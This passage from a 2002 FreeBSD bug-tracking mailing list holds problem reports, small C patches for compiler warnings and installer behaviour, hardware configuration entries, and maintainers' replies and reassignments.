*s2, *special, *opstring; + int fsi = -1, fso, len, n, vflag; + char *cp = NULL, *s1, *s2, *special, *opstring; #ifdef MFS struct vfsconf vfc; int error; @@ -626,7 +628,8 @@ rewritelabel(special, fso, lp); if (!Nflag) close(fso); - close(fsi); + if ( fsi >= 0 ) + close(fsi); #ifdef MFS if (mfs) { struct mfs_args args; @@ -692,6 +695,7 @@ return (&lab); } +void rewritelabel(s, fd, lp) char *s; int fd; --- src/sbin/newfs/mkfs.c.ORIG Mon Sep 24 19:58:55 2001 +++ src/sbin/newfs/mkfs.c Wed Jun 26 23:28:01 2002 @@ -168,6 +168,12 @@ caddr_t realloc __P((char *, u_long)); #endif +#if __STDC__ +void fatal(const char *fmt, ...); +#else +void fatal(); +#endif + int mfs_ppid = 0; void >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 26 18: 1:23 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1CD3E37D56C for ; Wed, 26 Jun 2002 17:50:02 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5R0o2JU095097 for ; Wed, 26 Jun 2002 17:50:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5R0o2r4095096; Wed, 26 Jun 2002 17:50:02 -0700 (PDT) Received: from xkulesh.vol.cz (xkulesh.vol.cz [195.250.154.106]) by hub.freebsd.org (Postfix) with ESMTP id F0E5037D0E0 for ; Wed, 26 Jun 2002 17:37:33 -0700 (PDT) Received: from obluda.cz (localhost [127.0.0.1]) by xkulesh.vol.cz (8.12.3/8.12.3) with ESMTP id g5R0bVTx061818 for ; Thu, 27 Jun 2002 02:37:31 +0200 (CEST) (envelope-from dan@obluda.cz) Received: (from root@localhost) by obluda.cz (8.12.4/8.12.4/Submit) id g5R0F6ps061160; Thu, 27 Jun 2002 02:15:06 +0200 (CEST) Message-Id: <200206270015.g5R0F6ps061160@obluda.cz> Date: Thu, 27 Jun 2002 02:15:06 +0200 (CEST) From: Dan Lukes Reply-To: Dan Lukes To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/39907: cleaning sbin/savecore code from warnings Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39907 >Category: bin >Synopsis: cleaning sbin/savecore code from warnings >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Jun 26 17:50:02 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Dan Lukes >Release: FreeBSD 4.6-STABLE i386 >Organization: Obludarium >Environment: System: FreeBSD xkulesh.vol.cz 4.6-STABLE FreeBSD src/sbin/savecore/savecore.c,v 1.28.2.13 2002/04/07 21:17:50 >Description: sbin/savecore/savecore.c: In function `dump_exists': 354: warning: unsigned int format, u_long arg (arg 3) 354: warning: unsigned int format, u_long arg (arg 4) /usr/src/sbin/savecore/savecore.c: In function `save_core': 420: warning: int format, different type arg (arg 2) dumpsize is (off_t) e.g. (_BSD_OFF_T) e.g. (__int64_t) e.g. (long long) >How-To-Repeat: N/A >Fix: --- sbin/savecore/savecore.c.ORIG Mon Apr 8 01:16:19 2002 +++ sbin/savecore/savecore.c Thu Jun 27 02:12:31 2002 @@ -350,7 +350,7 @@ (off_t)(dumplo + ok(dump_nl[X_DUMPMAG].n_value)), L_SET); if (newdumpmag != dumpmag) { if (verbose) - syslog(LOG_WARNING, "magic number mismatch (%x != %x)", + syslog(LOG_WARNING, "magic number mismatch (%lx != %lx)", newdumpmag, dumpmag); syslog(LOG_WARNING, "no core dump"); return (0); @@ -417,7 +417,7 @@ syslog(LOG_NOTICE, "writing %score to %s", compress ? "compressed " : "", path); for (; dumpsize > 0; dumpsize -= nr) { - (void)printf("%6dK\r", dumpsize / 1024); + (void)printf("%6lldK\r", dumpsize / 1024); (void)fflush(stdout); nr = read(dumpfd, buf, MIN(dumpsize, sizeof(buf))); if (nr <= 0) { >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 26 18:12:43 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 573C537B927 for ; Wed, 26 Jun 2002 18:10:04 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5R1A4JU001790 for ; Wed, 26 Jun 2002 18:10:04 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5R1A4QO001789; Wed, 26 Jun 2002 18:10:04 -0700 (PDT) Date: Wed, 26 Jun 2002 18:10:04 -0700 (PDT) Message-Id: <200206270110.g5R1A4QO001789@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Brooks Davis Subject: Re: bin/39868: cleaning sbin/dump code from warnings Reply-To: Brooks Davis Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/39868; it has been noted by GNATS. From: Brooks Davis To: Dan Lukes Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: bin/39868: cleaning sbin/dump code from warnings Date: Wed, 26 Jun 2002 18:00:34 -0700 On Wed, Jun 26, 2002 at 01:05:41AM +0200, Dan Lukes wrote: > > >Synopsis: cleaning sbin/dump code from warnings Thank you for submitting patches to address the warnings in this code. Unfortunatly, you had really bad timing and the code in -current has changed significantly due to the changes required for UFS2 support. This means it is unlikely these patches will apply to -current. They will apply to -stable, but I'm not sure what we want to do about that given that there won't be significantly development of file system changes in -stable. -- Brooks To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 26 19: 6:33 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E575C37C06D for ; Wed, 26 Jun 2002 19:00:06 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5R206JU006601 for ; Wed, 26 Jun 2002 19:00:06 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5R206ig006600; Wed, 26 Jun 2002 19:00:06 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by hub.freebsd.org (Postfix) with ESMTP id 6365E37E6BE for ; Wed, 26 Jun 2002 18:55:56 -0700 (PDT) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g5R1tuOT096313 for ; Wed, 26 Jun 2002 18:55:56 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g5R1tupP096312; Wed, 26 Jun 2002 18:55:56 -0700 (PDT) Message-Id: <200206270155.g5R1tupP096312@www.freebsd.org> Date: Wed, 26 Jun 2002 18:55:56 -0700 (PDT) From: Ash Garg To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/39908: releaseName env variable not reference in install.c Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39908 >Category: misc >Synopsis: releaseName env variable not reference in install.c >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Jun 26 19:00:06 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Ash Garg >Release: 4.5 >Organization: Telstra >Environment: FreeBSD Pluto.telstra.net 4.5-RELEASE-p5 FreeBSD 4.5-RELEASE-p5 #0: Wed May 29 14:06:20 EST 2002 agarg@Pluto.telstra.net:/usr/obj/usr/src/sys/PLUTO i386 >Description: The environment varible releaseName or VAR_RELNAME is not used to get the Release Name when running in the interactive mode even though it has been set. The kern.osrelease is used always. >How-To-Repeat: >Fix: Modify the function static char* getRelname(void) in /usr/src/release/sysinstall/install.c to check if the environment variable exists and if it does, then use it. Original Function ----------------- static char * getRelname(void) { static char buf[64]; int sz = (sizeof buf) - 1; if (sysctlbyname("kern.osrelease", buf, &sz, NULL, 0) != -1) { buf[sz] = '\0'; return buf; } else return ""; } } Modified Function -----------------static char * getRelname(void) { static char buf[64]; int sz = (sizeof buf) - 1; /* Ash's Mods Start */ char* rel; rel=variable_get(VAR_RELNAME); if(rel==NULL) { /* Mods Finish */ if (sysctlbyname("kern.osrelease", buf, &sz, NULL, 0) != -1) { buf[sz] = '\0'; return buf; } else return ""; } /* Mods Start */ else { return rel; } /* Mods Stop */ } >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 26 20: 0:31 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6066D37B420 for ; Wed, 26 Jun 2002 20:00:13 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5R30DJU016878 for ; Wed, 26 Jun 2002 20:00:13 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5R30Dfb016876; Wed, 26 Jun 2002 20:00:13 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by hub.freebsd.org (Postfix) with ESMTP id C3F9E37B419 for ; Wed, 26 Jun 2002 19:59:14 -0700 (PDT) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g5R2xAOT001129 for ; Wed, 26 Jun 2002 19:59:10 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g5R2xAXk001128; Wed, 26 Jun 2002 19:59:10 -0700 (PDT) Message-Id: <200206270259.g5R2xAXk001128@www.freebsd.org> Date: Wed, 26 Jun 2002 19:59:10 -0700 (PDT) From: Kevin Van Maren To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/39911: New Netgear MA401 pccard does not work with FreeBSD Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39911 >Category: misc >Synopsis: New Netgear MA401 pccard does not work with FreeBSD >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Jun 26 20:00:12 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Kevin Van Maren >Release: 4.5-RELEASE/4.6-RELEASE >Organization: >Environment: FreeBSD 4.6-RELEASE >Description: The newest MA401 802.11b wireless PCMCIA cards do not work with FreeBSD because of a change in the ientifier string. The "MA401" is now called a "MA401RA" even though the card is functionally identical and is still supported by the same driver. >How-To-Repeat: Buy the latest Netgear 802.11b card and try to use it. >Fix: Add this section to /etc/default/pccard.conf (clone of the MA401 entry): # Netgear MA401RA card "NETGEAR MA401RA Wireless PC" "Card" config auto "wi" ? 0x10000 insert /etc/pccard_ether $device start remove /etc/pccard_ether $device stop >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 26 23:56:41 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 596C537B407; Wed, 26 Jun 2002 23:56:38 -0700 (PDT) Received: from freefall.freebsd.org (cjc@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5R6ucJU056629; Wed, 26 Jun 2002 23:56:38 -0700 (PDT) (envelope-from cjc@freefall.freebsd.org) Received: (from cjc@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5R6ucea056625; Wed, 26 Jun 2002 23:56:38 -0700 (PDT) Date: Wed, 26 Jun 2002 23:56:38 -0700 (PDT) From: "Crist J. Clark" Message-Id: <200206270656.g5R6ucea056625@freefall.freebsd.org> To: cjc@FreeBSD.org, freebsd-bugs@FreeBSD.org, sos@FreeBSD.org Subject: Re: kern/39449: wierd ata status Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: wierd ata status Responsible-Changed-From-To: freebsd-bugs->sos Responsible-Changed-By: cjc Responsible-Changed-When: Wed Jun 26 23:55:53 PDT 2002 Responsible-Changed-Why: Now that this has been narrowed a bit and patch provided, give it to the ATA maintainer for consideration. http://www.freebsd.org/cgi/query-pr.cgi?pr=39449 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 0:12: 1 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DBF3837B400 for ; Thu, 27 Jun 2002 00:10:29 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5R7ANJU061787 for ; Thu, 27 Jun 2002 00:10:24 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5R7A8ab061738; Thu, 27 Jun 2002 00:10:08 -0700 (PDT) Date: Thu, 27 Jun 2002 00:10:08 -0700 (PDT) Message-Id: <200206270710.g5R7A8ab061738@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Crist J. Clark" Subject: Re: bin/39896: netmask 0xffffff00 no longer works in /etc/exports Reply-To: "Crist J. Clark" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/39896; it has been noted by GNATS. From: "Crist J. Clark" To: j_guojun@lbl.gov Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: bin/39896: netmask 0xffffff00 no longer works in /etc/exports Date: Thu, 27 Jun 2002 00:05:26 -0700 On Wed, Jun 26, 2002 at 01:56:15PM -0700, Jin Guojun wrote: [snip] > Somehow, netmask format in /etc/exports is restricted to > ###.###.###.### only. > /data -maproot=bin: -network 131.104.48 -mask 255.255.255.0 > > eubie# kill -HUP `cat /var/run/mountd.pid` > eubie# mount eubie:/data /mnt > eubie# > > The following format does not work any more > /data -maproot=bin: -network 131.104.48 -mask 0xffffff00 > > mountd does not complain, but silently denies to export this > partition: > > eubie# kill -HUP `cat /var/run/mountd.pid` > eubie# mount eubie:/data /mnt > eubie:/data: Permission denied > > > >How-To-Repeat: > add similar line to /etc/exports, restart mountd, and > mount this partition locally or remotely. > > /data -maproot=bin: -network 131.104.48 -mask 0xffffff00 > >Fix: > > Is any reason to make such change? or Is this a bug? I can't reproduce this. # uname -r 4.6-RELEASE # grep ^/export /etc/exports /export -alldirs -ro -network 192.168.64 -mask 255.255.255.0 # kill -HUP `cat /var/run/mountd.pid` # showmount -e | grep ^/export /export 192.168.64.0 And on a different machine on that net, I can mount it fine. -- Crist J. Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 0:17:51 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5918437B407; Thu, 27 Jun 2002 00:17:47 -0700 (PDT) Received: from freefall.freebsd.org (cjc@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5R7HlJU062595; Thu, 27 Jun 2002 00:17:47 -0700 (PDT) (envelope-from cjc@freefall.freebsd.org) Received: (from cjc@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5R7HlP8062591; Thu, 27 Jun 2002 00:17:47 -0700 (PDT) Date: Thu, 27 Jun 2002 00:17:47 -0700 (PDT) From: "Crist J. Clark" Message-Id: <200206270717.g5R7HlP8062591@freefall.freebsd.org> To: cjc@FreeBSD.org, freebsd-bugs@FreeBSD.org, imp@FreeBSD.org Subject: Re: misc/39772: pccardd is slow to install a PCCARD. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: pccardd is slow to install a PCCARD. Responsible-Changed-From-To: freebsd-bugs->imp Responsible-Changed-By: cjc Responsible-Changed-When: Thu Jun 27 00:17:18 PDT 2002 Responsible-Changed-Why: Give it to the PCCard man to evaluate. http://www.freebsd.org/cgi/query-pr.cgi?pr=39772 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 0:19:47 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 15A4437B400; Thu, 27 Jun 2002 00:19:39 -0700 (PDT) Received: from freefall.freebsd.org (cjc@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5R7JdJU062700; Thu, 27 Jun 2002 00:19:39 -0700 (PDT) (envelope-from cjc@freefall.freebsd.org) Received: (from cjc@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5R7Jdaa062696; Thu, 27 Jun 2002 00:19:39 -0700 (PDT) Date: Thu, 27 Jun 2002 00:19:39 -0700 (PDT) From: "Crist J. Clark" Message-Id: <200206270719.g5R7Jdaa062696@freefall.freebsd.org> To: cjc@FreeBSD.org, freebsd-bugs@FreeBSD.org, re@FreeBSD.org Subject: Re: i386/39574: Error mounting /dev/acd0c on /dist: No such file for directory when Intalling 4.4 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Error mounting /dev/acd0c on /dist: No such file for directory when Intalling 4.4 Responsible-Changed-From-To: freebsd-bugs->re Responsible-Changed-By: cjc Responsible-Changed-When: Thu Jun 27 00:19:15 PDT 2002 Responsible-Changed-Why: Install issues go to re@. http://www.freebsd.org/cgi/query-pr.cgi?pr=39574 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 0:20:18 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 709B537B407 for ; Thu, 27 Jun 2002 00:20:03 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5R7K3JU062760 for ; Thu, 27 Jun 2002 00:20:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5R7K3rb062759; Thu, 27 Jun 2002 00:20:03 -0700 (PDT) Date: Thu, 27 Jun 2002 00:20:03 -0700 (PDT) Message-Id: <200206270720.g5R7K3rb062759@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Crist J. Clark" Subject: Re: bin/39849: /sbin/restore fails to overwrite files with schg flag set Reply-To: "Crist J. Clark" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/39849; it has been noted by GNATS. From: "Crist J. Clark" To: "Michael C. Adler" Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: bin/39849: /sbin/restore fails to overwrite files with schg flag set Date: Thu, 27 Jun 2002 00:15:41 -0700 On Tue, Jun 25, 2002 at 01:24:31PM -0400, Michael C. Adler wrote: [snip] > Incremental restore fails to overwrite an older file that has a flag > set making the file immutable. I really think this is a feature and not a bug. However, I can see where one might want this. I think the right way would be to have a command line switch which enables this [su]chg-flag clobbering, and leave the default as-is. Note that there are other, tougher issues when doing restores on an existing filesystem when names collide (e.g. does restore(8) over-write an existing directory with a plain file from backup?). Handling this issue by running a, # chflags -R 0 /filesystem/path Before a restore(8) is fairly trivial. -- Crist J. Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 0:21:22 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6243137B406; Thu, 27 Jun 2002 00:21:09 -0700 (PDT) Received: from freefall.freebsd.org (cjc@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5R7L9JU063245; Thu, 27 Jun 2002 00:21:09 -0700 (PDT) (envelope-from cjc@freefall.freebsd.org) Received: (from cjc@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5R7L8M1063224; Thu, 27 Jun 2002 00:21:08 -0700 (PDT) Date: Thu, 27 Jun 2002 00:21:08 -0700 (PDT) From: "Crist J. Clark" Message-Id: <200206270721.g5R7L8M1063224@freefall.freebsd.org> To: vd@etrade.bg, cjc@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/39573: uid 0 check in install.sh in 4.6-disc1.iso can be circumvented Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: uid 0 check in install.sh in 4.6-disc1.iso can be circumvented State-Changed-From-To: open->closed State-Changed-By: cjc State-Changed-When: Thu Jun 27 00:19:58 PDT 2002 State-Changed-Why: The check is not a security feature. http://www.freebsd.org/cgi/query-pr.cgi?pr=39573 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 0:22:41 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D600237B442; Thu, 27 Jun 2002 00:22:26 -0700 (PDT) Received: from freefall.freebsd.org (cjc@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5R7MPJU063377; Thu, 27 Jun 2002 00:22:25 -0700 (PDT) (envelope-from cjc@freefall.freebsd.org) Received: (from cjc@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5R7MPF8063373; Thu, 27 Jun 2002 00:22:25 -0700 (PDT) Date: Thu, 27 Jun 2002 00:22:25 -0700 (PDT) From: "Crist J. Clark" Message-Id: <200206270722.g5R7MPF8063373@freefall.freebsd.org> To: cjc@FreeBSD.org, freebsd-bugs@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/39476: profxp will run but when you fxp a file it will transfer the first file and hang Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: profxp will run but when you fxp a file it will transfer the first file and hang Responsible-Changed-From-To: freebsd-bugs->freebsd-ports Responsible-Changed-By: cjc Responsible-Changed-When: Thu Jun 27 00:21:46 PDT 2002 Responsible-Changed-Why: Misfiled PR. http://www.freebsd.org/cgi/query-pr.cgi?pr=39476 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 3: 0:23 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 36A1A37B409 for ; Thu, 27 Jun 2002 03:00:12 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5RA0CJU087975 for ; Thu, 27 Jun 2002 03:00:12 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5RA0BCG087974; Thu, 27 Jun 2002 03:00:11 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by hub.freebsd.org (Postfix) with ESMTP id 01F2437B406 for ; Thu, 27 Jun 2002 02:52:36 -0700 (PDT) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g5R9qYOT069442 for ; Thu, 27 Jun 2002 02:52:34 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g5R9qYT6069441; Thu, 27 Jun 2002 02:52:34 -0700 (PDT) Message-Id: <200206270952.g5R9qYT6069441@www.freebsd.org> Date: Thu, 27 Jun 2002 02:52:34 -0700 (PDT) From: Reto Trachsel To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: bin/39918: Userland PPP - CHAP and PAP are swaped Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39918 >Category: bin >Synopsis: Userland PPP - CHAP and PAP are swaped >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Jun 27 03:00:11 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Reto Trachsel >Release: FreeBSD 4.5-STABLE >Organization: Netmodule AG >Environment: FreeBSD jona.pacific 4.5-STABLE FreeBSD 4.5-STABLE #1: Wed Apr 3 11:36:12 CEST 2002 root@jona.pacific:/usr/src/sys/compile/JONA i386 >Description: Connection with userland ppp ( /usr/sbin/ppp ) to a PPP Server. The LCP Options are set as: ----- ppp ON jona> show lcp deflink: LCP [Initial] his side: MRU 1500, ACCMAP ffffffff, PROTOCOMP off, ACFCOMP off, MAGIC 00000000, MRRU 0, SHORTSEQ off, REJECT 0000 my side: MRU 1500, ACCMAP 00000000, PROTOCOMP on, ACFCOMP on, MAGIC 1445eca3, MRRU 0, SHORTSEQ off, REJECT 0000 Defaults: MRU = any (max 2048), MTU = any (max 2048), ACCMAP = 00000000 LQR period = 30s, Open Mode = active (delay 1s) FSM retry = 3s, max 5 Config REQs, 5 Term REQs Ident: Negotiation: ACFCOMP = disabled & denied CHAP = disabled & denied CHAP80 = disabled & denied LANMan = disabled & denied CHAP81 = disabled & denied LQR = disabled & denied PAP = disabled & accepted PROTOCOMP = disabled & denied ----- -> Only PAP is enabled. If i try to connect to the PPP Server, the log of the userland ppp shows, that the pap option was rejected. The channel can't build up. On the PPP Server (an Embedded System with serveral log an diagnostic monitors, the options are false! The userland ppp send a chap option instead ofthe pap option! The same behavour the other way. If the PPP Server provide PAP/CHAP negotiation, the userland ppp log shows the LCP PAP Authentification, but in effect, on the PPP Link the CHAP Auth proto is used (MD5 hasches!). >How-To-Repeat: Try to connect to a CHAP only PPP-Server with the userland ppp (LCP Option: Only CHAP activated) -> NO connection available. Try to connect to a PAP only PPP-Server with ths userland ppp (LCP Option: Only PAP activated) -> NO connection available. >Fix: Set the correct options in the userland ppp (deny/accept || enable|disable) >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe 